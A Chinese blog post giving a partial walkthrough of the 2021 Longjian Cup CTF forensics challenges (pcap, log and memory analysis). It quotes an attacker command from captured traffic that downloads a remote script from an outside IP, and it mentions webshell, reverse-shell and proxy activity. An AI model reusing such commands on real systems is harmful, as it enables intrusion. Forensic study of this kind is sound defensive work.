2021陇剑杯部分WP

最新推荐文章于 2024-06-17 23:57:34 发布
最新推荐文章于 2024-06-17 23:57:34 发布
阅读量4.8k 收藏 16
点赞数 10
分类专栏: CTF's WP 运维 文章标签: 流量分析 网络安全 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40568770/article/details/120311122
版权

写在前面的话,结局排名离谱,最后两分钟直接掉了70多名,排出100以外…很久没有打比赛了,但是也没想到国内的CTF环境已经差到这种地步了,另外就是题目都挺好,个别的题目暂时这里不给出解题过程,见谅

签到

操作内容:
看请求包,http请求返回403

Jwt

操作内容:

  1. 看cookie,jwt格式
  2. 找个在线解jwt的网站,将cookie解码,注意不要解登录失败那个,解登陆成功的
  3. 看流量包。alert(“root”)
  4. wireshark打开,包序号103 109这两个包,将文件都试下
  5. 包序号109,用echo写了个makefile,能看到so的名字
  6. 包序号 129,/etc/pam.d/common-auth

Webshell

操作内容:
3.1追踪tcp流,第5流得到密码
在这里插入图片描述

3.2黑客修改了一个日志文件,文件的绝对路径为_____________。(请确认绝对路径后再提交)
追踪第31流的tcp流,然后看http报文,得到当前绝对路径,然后拼上这个log的名字
在这里插入图片描述

3.3黑客获取webshell之后,权限是______
查看whoami的返回结果,(不过一般猜也能猜到是www-data)
在这里插入图片描述

3.4黑客写入的webshell文件名是_____________。
后面访问的1.php即是webshell文件

在这里插入图片描述

3.5黑客上传的代理工具客户端名字是_____________。(如有字母请全部使用小写)
查看post内容,urldecode解码后,base64解码键为j680……的值的内容(根据代码内容,有一个substr,需要去除开头两个字符。)解码得到frpc.ini
在这里插入图片描述
在这里插入图片描述

3.6黑客代理工具的回连服务端IP是_____________。
3.7黑客的socks5的连接账号、密码是______。(中间使用#号隔开,例如admin#passwd)
十六进制解码键为xa5d……的值,得到所有信息,包括回连IP、回连端口、用户名、密码,代理插件等等

日志分析

操作内容:
1.看流量www.zip
在这里插入图片描述

  1. access.log,发现了写…/…/…/…/…/…/…//tmp/sess_car字段,判断文件/tmp/sess_car
  2. 读文件使用的类是SplFileObject

在这里插入图片描述

流量分析

操作内容:
分析pcap流量包,主机ip应该是172.18.0.1,可以看到很多UDP协议的包。在看包内容的时候,注意到UDP包头都是P05=,而且有的是有base64,也有乱码的包。P05=后面都是00 00 00 00和01 00 00 00,其中00的长度是32、01的长度是16,可能是认证。

根据长度为16猜测可能是aes,用长度16的base64(即P05=后面是01 00 00 00的)作为aes key解密发现解密成功了,02 00 00 00对应的包里面都有一个可见字符,其中受害IP172.18.0.125有命令:wget http://147.182.251.98/d.sh;所以第一问为127.18.0.125,第二问密钥就是18217号包里的DtX0GScM9dwrgZht,第三问ip即为147.182.251.98(udp.stream eq 85)
在这里插入图片描述
在这里插入图片描述

内存分析

操作内容:
6.1 使用工具volatility(kali自带)
imageinfo指令获取系统信息
在这里插入图片描述

直接使用lsadump指令查看最后登录的用户
在这里插入图片描述

得到flag
flag{W31C0M3 T0 THiS 34SY F0R3NSiCX}

6.2

filescan 指令扫描文件
可以把输出内容保存到新文本文件中便于查看

找到HUAWEI P40
在这里插入图片描述

使用dumpfiles指令提取文件
在这里插入图片描述

Kali中可以直接从dat文件中解压得到备份数据包文件夹
在这里插入图片描述
在这里插入图片描述

打开发现为加密文件
在这里插入图片描述

查到可以使用华为的数据包解密工具
https://github.com/RealityNet/kobackupdec
使用指令python3 kobackupdec.py -vvv 密码 加密文件夹 解密存储目录
根据提示 密码为上题中的flag空格换成_
W31C0M3_T0_THiS_34SY_F0R3NSiCX
即可得到解密后的文件夹(此处为a)
在这里插入图片描述

解密文件位于 a\storage\MediaTar\images
打开images0.tar压缩包 得到图片flag

简单日志分析

操作内容:
1.2根据流量包
3 查看流量请求包的一段base64。编码 解码会发现进行了反弹shell操作

SQL注入

操作内容:

  1. 注入语句采用if语句,如果成功返回正常界面,bool盲注
  2. 找注数据库,表,字段的语句,取注入每位时的边界值,拼接
  3. 找注flag值的语句,取注入每位时的边界值,拼接。

WIFI

操作内容:

暂不放出

ios

操作内容:
1.通过查看内部ip192.168.1.8与外部3.128.156.159通信的流量
2.wget 发现了使用的工具
在这里插入图片描述

3.根据使用文档和流量可知密钥为hack4sec
在这里插入图片描述

4.一个个数的。。正则提取下就出来了。746558f3-c841-456b-85d7-d6c0f2edabb2
在这里插入图片描述

5.在之前看的时候就觉得有些许不对劲,到了第五题发现果然是个疑似扫描的东西,继续往下翻,到这里结束,得出10-499
在这里插入图片描述
在这里插入图片描述

6.暂不公布
7.查看ip192.168.1.8对内网的异常流量可以发现。
8.查看log文件,小马的参数即是密码

机密内存

操作内容:
暂不公布

YYK[17|6]
关注
  • 10
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 12
    评论
专栏目录
2021陇剑杯部分wp
hezhing
11-03 1208
2021陇剑杯 全是流量分析。麻了。只做了一部分。 参考链接 陇剑杯 个人 ’WriteUp‘-魔法少女雪殇 (snowywar.top) 陇剑杯Writeup(部分) - 惊觉 (leheavengame.com) 1.签到 题目描述: 网关小王在上网途中发现自己的网络访问异常缓慢,于是对网络出口捕获了流量,请您分析流量后进行回答: 1.1:     #### 题目:     此时正在进行的可能是http 协议的网络攻击。
2021年“陇剑杯部分WP
mwmbfh的博客
09-15 1902
2021年"陇剑杯"部分WP一、 战队信息二、 解题情况三、 解题过程题目3.1题目3.1操作内容题目3.1flag值题目7.1题目7.1操作内容题目7.1flag值题目8.1题目8.1操作内容题目8.1flag值题目8.2题目8.2操作内容题目8.2flag值题目8.3题目8.3操作内容题目8.2flag值 一、 战队信息 战队名称:fuller 二、 解题情况 三、 解题过程 题目3.1 题目3.1操作内容 使用wireshark打开题目文件,使用筛选条件,选择发送的数据。 Ø
misc刷题记录2[陇剑杯 2021]
最新发布
2301_81841047的博客
06-17 1159
由上可知,在登录成功是在101以后 ,所以直接往后面找就可以,定位到了关键信息,但是通过分析可知,这里获得的是相对路径,通过前面对流量包的分析可知,这里使用的系统是linux,那么也就是说,可以猜测前面的内容应该是/var/www/html,但是保险起见,还是筛选一下pwd命令,看看完整路径,这里检测pwd是因为按照做题经验,一般修改以后都会用pwd命令看看是否修改成功。命令会打印出当前正在工作的目录的绝对路径。这里要求的是权限,思路是先检索关键字“whoami”,因为这个命令可以查看现在用户的权限状态,
2021 [线下]陇剑杯 wp
qq_45603443的博客
09-29 7393
2021 [线下]陇剑杯 wp前言1.11.21.31.41.53.13.34.14.25.15.2Tip 前言 wp由EDI yanshu师傅投稿 ,感谢yanshu师傅。 部分题目为赛后复现。 部分题目复现方法由一些师傅提供解题思路,感谢。 题目附件获取方法在文章末尾。 1.1 导出对象 发现 6.html 中有颜文字 解开后 alert(“EBA01E64-416C-419E-9C9A-C807AD9741D2”); 1.2 全局搜X-Forwarded-For,会发现它ip是五位的,答案
陇剑杯2021部分wp
5L2g556F5ZWl77yf
09-15 1632
赛后看了别的师傅的wp在此复现,做个笔记好好学习。 文章目录签到1.1jwt2.12.22.32.42.52.6webshell3.13.23.33.43.53.63.7日志分析4.14.24.3内存分析6.16.2简单日志分析7.17.27.3sql注入8.18.28.3 签到 1.1 http jwt 2.1 jwt 2.2 黑客绕过验证使用的jwt中,id和username是______。(中间使用#号隔开,例如1#admin) JWT 主要由三部分组成,每部分 用 . 分割
2021陇剑杯网络安全大赛wp-IOS部分(详细题解)
偷一个月亮
09-15 4864
10.1 Ios题目描述: 一位ios的安全研究员在家中使用手机联网被黑, 不仅被窃密还丢失比特币若干, 请你通过流量和日志分析后作答 黑客所控制的C&C服务器IP是_____________。 3.128.156.159 10.2 黑客利用的Github开源项目的名字是______。(如有字母请全部使用小写) 10.3 通讯加密密钥的明文是____________。 在第一题里能看到 hack4sec 10.5 黑客端口扫描的扫描器的扫描范围是____________。(
2021陇剑杯线下赛题目
04-10
守护数字安全,构建清朗空间!首届“陇剑杯网络安全大赛,全国首次“以防为主”的网络安全大赛。
UNCTF2021 部分wp.pdf
12-10
UNCTF2021 部分 WP 解题报告 本文档对 UNCTF2021 部分 WP 进行了详细的解题报告,涵盖了 WEB、PHP、MYSQL、CRYPTO 等方面的知识点。 1. Fuzz_md5Get 和 Post 传参绕过 在 UNCTF2021 的 WEB 部分中,我们遇到了一...
2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真题 wp 解题思路
08-17
2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真题 WP 解题思路 本资源为2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真题的 WP 解题思路,涵盖了四个题目,分别为蓝01-取证、蓝02-取证、蓝03-取证...
2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真题
08-17
2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真题 CTF 2021 指挥官杯 wp 真题
2021年“绿城杯”网络安全大赛
09-30
2021年“绿城杯”网络安全大赛是一场聚焦网络安全技术的竞技活动,旨在提升参赛者在信息安全领域的专业技能,增强社会对网络安全的重视。CTF(Capture The Flag)是网络安全竞赛的一种形式,参赛团队通过解决一系列...
红帽杯wp红帽杯wp
05-06
红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp
2021-河南省金盾杯-部分题目wp(详细)
02-06
WEB:上传你的头像吧、上传你的压缩包吧、管理员才能拿flag Crypto:Hi There、低音吉他谱、未完成的宣传图 Misc:潦草的笔记、这可是关键信息、hello-world Reverse:Re1、Re2、Re4
[2021东华杯]JK战队WP1
08-03
在分析这个【2021东华杯】JK战队WP1的题目时,我们可以看到它涉及到的是一个Java安全和反序列化漏洞的利用问题。主要的知识点包括: 1. **反序列化**: 反序列化是将之前序列化的对象状态恢复为可操作的对象的过程...
2020 第二届网鼎杯 boom wp
01-20
2020 第二届网鼎杯 boom wp ​ ​ 卑微新手在线答题。。。。。 第二届网鼎杯-boom 下载附件得到一个boom.exe程序 打开是这样 根据提示继续 得到一串md5 加密的数据,使用在线解密 https://www.somd5.com/ 得到第...
UNCTF2021WP.pdf
12-10
UNCTF2021WP.pdf
2021陇剑杯网络安全大赛wp-webshell部分(详细题解)
偷一个月亮
09-15 6617
3.1 3.2 其中web根目录可以再system命令中看到 3.3 3.4 3.5 写frpc配置文件,推测为frpc,正确 实际上传动作为 L3Zhci93d3cvaHRtbC9mcnBj解码base64即为/var/www/html/frpc 3.6 3.5中写配置动作,hex转字符后,如下 3.7 同上 ...
2021陇剑杯网络安全大赛wp-日志分析部分(详细题解)
偷一个月亮
09-15 5942
4.1 发现状态多是404,应为目录爆破,根据http 状态200筛选出实际存在的文件,发现www.zip,一般位网站源码备份文件 4.2 4.3 根据200 定位到此,发现是urldecode发现是反序列化漏洞
记一次流量分析实战——2021陇剑杯(webshell)
热门推荐
Battery的博客
08-15 11万+
1.分析数据包hack.pcap,黑客登录系统使用的密码是________。2.分析数据包hack.pcap,黑客修改了一个文件日志,文件的绝对路径为________。3.分析数据包hack.pcap,黑客获取webshell之后,权限是_________?4.分析数据包hack.pcap,黑客写入的webshell文件名是_________。5.分析数据包hack.pcap,黑客上传的代理工具客户端名字是__________。......
2021陇剑杯线下赛 wp
09-02
2021陇剑杯线下赛wp指的是该比赛的胜利方案(Winning Proposal)。这个问题的答案取决于具体的比赛和题目,因此我无法提供具体的场景和情况。不过,我可以向你介绍一些常见的比赛wp示例,帮助你理解wp的含义。 通常,比赛wp是指参赛者提出的在比赛中胜出的最佳方案。这种方案可能涉及各种因素,包括创新性、技术实施、解决问题的方法和效率等。具体来说,一个好的wp可能包括以下几个要素: 1. 题目分析:清晰理解比赛的题目和要求,明确问题的关键点和目标。 2. 解决方案:提出独特、创新和可行的解决方案,展示自己的技术和专业知识。 3. 实施计划:描述实施该方案的详细步骤和时间表,包括资源的分配和团队协作。 4. 风险分析:识别潜在的风险和挑战,并提供解决方法和备选方案。 5. 评估指标:明确关键的评估指标和成功的标准,展示方案的效果和可衡量的结果。 在许多比赛中,评委会或专家小组会对参赛者提交的wp进行评审,选出最佳的方案。一个优秀的wp将会体现出创新性、可行性和适应性。并且,一个优秀的方案通常能够提供有说服力的理由来解释为什么这个方案是最好的,以及为什么它比其他方案更优秀。 总的来说,2021陇剑杯线下赛wp是指在比赛中成功的方案,这个方案提供了创新、可行和有效的解决问题的方法,并且能够清晰地展示其技术和团队的能力。
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值